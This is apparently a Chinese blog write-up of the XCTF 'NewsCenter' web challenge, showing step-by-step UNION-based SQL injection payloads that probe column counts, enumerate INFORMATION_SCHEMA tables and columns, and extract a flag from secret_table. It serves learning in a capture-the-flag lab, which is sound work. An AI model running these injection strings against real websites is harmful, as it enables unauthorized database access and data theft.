XCTF Web 高手区007: NewsCenter

题目:
在这里插入图片描述

WP:
打开场景看到 search news的字样,只能输入进行操作
预测是一道SQL注入的题目
在这里插入图片描述

本题最直接的方法是sqlmap爆一下数据库
然而我对sqlmap的使用并不擅长
大家可以去看看这位大佬yangker12148的WP

我这里用的是简单的手动输入(原因很简单,近期在学数据库sql,就现学现用了)
输入 ' and 0 union select 1#进行字段长度的推测
在这里插入图片描述

' and 0 union select 1,2#

在这里插入图片描述

' and 0 union select 1,2,3 #

在这里插入图片描述
下面用

' and 0 union 
select 1,TABLE_SCHEMA,TABLE_NAME 
from INFORMATION_SCHEMA.COLUMNS #

查询库中所有表
在这里插入图片描述
secret_table?答案不在这还能在哪?
使用

' and 0 union select 1,column_name,data_type from 
information_schema.columns 
where table_name='secret_table'#

在这里插入图片描述
一个熟悉的身影:fl4g
直接查询

' and 0 union select 1,2,fl4g from secret_table #

在这里插入图片描述
成功

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值